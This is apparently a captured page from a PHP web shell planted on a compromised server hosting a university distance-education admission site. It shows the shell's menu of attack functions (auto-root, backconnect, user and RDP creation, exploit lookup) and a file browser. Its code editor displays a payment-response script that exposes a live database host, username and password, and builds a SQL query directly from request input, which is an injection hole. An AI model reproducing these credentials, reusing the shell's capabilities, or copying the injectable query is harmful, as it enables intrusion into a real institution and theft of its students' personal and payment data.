Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.188.190.212
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde /
adm_old /
[ HOME SHELL ]
Name
Size
Permission
Action
Paytm
[ DIR ]
drwxr-xr-x
Reports
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
documentation
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
MainPage.html
41.9
KB
-rwxr-xr-x
MainPage_2.html
5.89
KB
-rwxr-xr-x
Notification.pdf
1.24
MB
-rwxr-xr-x
Registrationpage.html
6.37
KB
-rwxr-xr-x
Reprint.html
7.53
KB
-rwxr-xr-x
Thumbs.db
3
KB
-rwxr-xr-x
admAppForm.html
9.88
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
appForm.html
16.39
KB
-rwxr-xr-x
appStatus2.html
12.3
KB
-rwxr-xr-x
cconfig.php
1.22
KB
-rwxr-xr-x
challan.html
8.38
KB
-rwxr-xr-x
chkResponse.php
434
B
-rwxr-xr-x
config_paytm.php
1.35
KB
-rwxr-xr-x
encdec_paytm.php
7.8
KB
-rwxr-xr-x
favicon.ico
1.83
KB
-rwxr-xr-x
h1.css
2.4
KB
-rwxr-xr-x
h1.html
5
KB
-rwxr-xr-x
h1.js
808
B
-rwxr-xr-x
homepage.html
8.5
KB
-rwxr-xr-x
index.html
10.01
KB
-rwxr-xr-x
index1.html
2.88
KB
-rwxr-xr-x
index2.html
5.09
KB
-rwxr-xr-x
logo.png
588.37
KB
-rwxr-xr-x
payment_gateway.php
7.78
KB
-rwxr-xr-x
paymentresponce.php
10.12
KB
-rwxr-xr-x
pgResponse.php
9.89
KB
-rwxr-xr-x
pgResponse_.php
9.12
KB
-rwxr-xr-x
readmission.html
6.53
KB
-rwxr-xr-x
upload.php
393
B
-rwxr-xr-x
upload1.php
389
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgResponse_.php
<?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); $servername = "72.167.46.92"; $username = "kusduser"; $password = "Logisys@2106"; $dbname = "resultsg_kusd"; $conn = new mysqli($servername, $username, $password, $dbname); $checkSum = ""; $paramList = array(); $appno = $_REQUEST['productinfo']; $get_data = "select fappno,ftotfee as ftotalfee, concat(fcollcode,fsnlno) as fregno, FCONTACT_NO as fmobileno, FEMAIL as femail from stud_adm where fappno = '{$appno}'"; $result = $conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { $fregno = $row['fregno']; $ftotalfee = $row['ftotalfee']; $femail = $row['femail']; $fmobileno = $row['fmobileno']; } } //var_dump($appno);var_dump($fregno);die(); $ORDER_ID = $appno; //$_POST["ORDER_ID"]; $CUST_ID = $fregno; //$_POST["CUST_ID"]; $INDUSTRY_TYPE_ID = 'EducationGovernment'; //$_POST["INDUSTRY_TYPE_ID"]; $CHANNEL_ID = 'WEB';//$_POST["CHANNEL_ID"]; $TXN_AMOUNT = $ftotalfee;//$_POST["TXN_AMOUNT"]; // Create an array having all required parameters for creating checksum. $paramList["MID"] = PAYTM_MERCHANT_MID; $paramList["ORDER_ID"] = $ORDER_ID; $paramList["EMAIL_ID"] = $femail; $paramList["MOBILE_NO"] = $fmobileno; $paramList["CUST_ID"] = $CUST_ID; $paramList["INDUSTRY_TYPE_ID"] = $INDUSTRY_TYPE_ID; $paramList["CHANNEL_ID"] = $CHANNEL_ID; $paramList["TXN_AMOUNT"] = $TXN_AMOUNT; $paramList["WEBSITE"] = PAYTM_MERCHANT_WEBSITE; $paramList["CALLBACK_URL"] = "http://logisys.net.in/kusdde/adm_22/pgResponse.php"; //$paramList["CALLBACK_URL"] = "http://logisys.net.in/results/kus/pgResponse.php"; /* $paramList["MSISDN"] = $MSISDN; //Mobile number of customer $paramList["EMAIL"] = $EMAIL; //Email ID of customer $paramList["VERIFIED_BY"] = "EMAIL"; // $paramList["IS_USER_VERIFIED"] = "YES"; // */ //Here checksum string will return by getChecksumFromArray() function. $checkSum = getChecksumFromArray($paramList,PAYTM_MERCHANT_KEY); ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <title>Addmission Panel</title> <!-- Favicon--> <link rel="icon" href="favicon.ico" type="image/x-icon"> <!-- Google Fonts --> <link href="https://fonts.googleapis.com/css?family=Roboto:400,700&subset=latin,cyrillic-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet" type="text/css"> <link href="plugins/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <!-- Bootstrap Core Css --> <link href="plugins/bootstrap/css/bootstrap.css" rel="stylesheet"> <!-- Waves Effect Css --> <link href="plugins/node-waves/waves.css" rel="stylesheet" /> <!-- Animation Css --> <link href="plugins/animate-css/animate.css" rel="stylesheet" /> <!-- Wait Me Css --> <link href="plugins/waitme/waitMe.css" rel="stylesheet" /> <link href="plugins/sweetalert/sweetalert.css" rel="stylesheet" /> <link href="plugins/dropzone/dropzone.css" rel="stylesheet"> <!-- Custom Css --> <link href="css/style.css" rel="stylesheet"> <!-- AdminBSB Themes. You can choose a theme from css/themes instead of get all themes --> <link href="css/themes/all-themes.css" rel="stylesheet" /> </head> <body class="theme-cyan"> <!-- Page Loader --> <div class="page-loader-wrapper"> <div class="loader"> <div class="preloader"> <div class="spinner-layer pl-red"> <div class="circle-clipper left"> <div class="circle"></div> </div> <div class="circle-clipper right"> <div class="circle"></div> </div> </div> </div> <p>Please wait...</p> </div> </div> <!-- #END# Page Loader --> <!-- Top Bar --> <nav class="navbar"> <div class="container-fluid" style="color: #fff;"> <div class='col-md-12 m-t--5'> <a href="index.html" style="float: right; padding-top: 15px;font-size:16px;color: #fff;">Home</a> <center> <h2>KUVEMPU UNIVERSITY</h2> </center> <center> <h3 style="margin-top: -4px;margin-right: 30px;">Admission Panel</h3> </center> </div> </div> </nav> <section class="content"> <div class="row clearfix"> <div class="container-fluid"> <div class="col-lg-10 col-md-10 col-sm-12 col-xs-12"> <div class="card p-l-20 p-r-20 p-b-100" style="padding-bottom: 200px"> <div class="header"> <h3>Kuvempu University</h3> <h2><small>Directorate of Distance Education</small></h2> </div> <div style="float: left;"> <a href='MainPage.html'><button class="btn btn-primary btn-lg waves-effect p-l-50 p-r-50 m-b--100 m-l-50" style="font-size: 20px;">Fresher</button></a> </div> <div style="float: right;"> <button type="button" class="btn btn-primary btn-lg waves-effect p-l-50 p-r-50 m-b--100 m-r-50 modal-header-50" data-toggle="modal" data-target="#exampleModal" style="font-size: 20px;"> Re-admission </button> </div> </div> </div> </div> </div> </div> </section> <!-- Modal --> <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true"> <div class="modal-dialog p-l-100" role="document"> <div class="modal-content"> <div class="modal-header"> <h4 class="modal-title" id="exampleModalLabel">Please Enter your Register Number<span style="color: red;">*</span></h4> </div> <div class="modal-body"> <div class="row clearfix" id = 'transcript'> <div class="col-sm-7"> <div class="form-group"> <span class='fieldError' id="studregno_err"> Register Number is required </span> <div class="form-line"> <input type="text" id="studregno" class="form-control" placeholder="Type Register No." required> </div> </div> </div> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" class="btn btn-primary" onclick="studentregno()">submit</button> </div> </div> </div> </div> <script src="js/appForm.js"></script> <script src="js/control.js"></script> <script src="js/validate.js"></script> <script src="js/MainPage.js"></script> <script src="js/Registrationpage.js"></script> <!-- Jquery Core Js --> <script src="plugins/jquery/jquery.min.js"></script> <!-- Bootstrap Core Js --> <script src="plugins/bootstrap/js/bootstrap.js"></script> <!-- Select Plugin Js --> <script src="plugins/bootstrap-select/js/bootstrap-select.js"></script> <!-- Slimscroll Plugin Js --> <script src="plugins/jquery-slimscroll/jquery.slimscroll.js"></script> <!-- Waves Effect Plugin Js --> <script src="plugins/node-waves/waves.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="js/pages/forms/form-wizard.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Autosize Plugin Js --> <script src="js/form_submit.js"></script> <!-- Input Mask Plugin Js --> <script src="plugins/jquery-inputmask/jquery.inputmask.bundle.js"></script> <script src="plugins/dropzone/dropzone.js"></script> <script src="plugins/bootstrap-tagsinput/bootstrap-tagsinput.js"></script> <script src="plugins/jquery-validation/jquery.validate.js"></script> <script src="plugins/jquery-steps/jquery.steps.js"></script> <script src="plugins/sweetalert/sweetalert.min.js"></script> <!-- Custom Js --> <script src="js/admin.js"></script> <script src="js/appStatus.js"></script> <!-- Demo Js --> <script src="js/demo.js"></script> <script type="text/javascript"> $(function() { $("li").click(function() { // remove classes from all $("li").removeClass("active"); // add class to the one we clicked $(this).addClass("active"); }); }); </script> </body> </html>
Close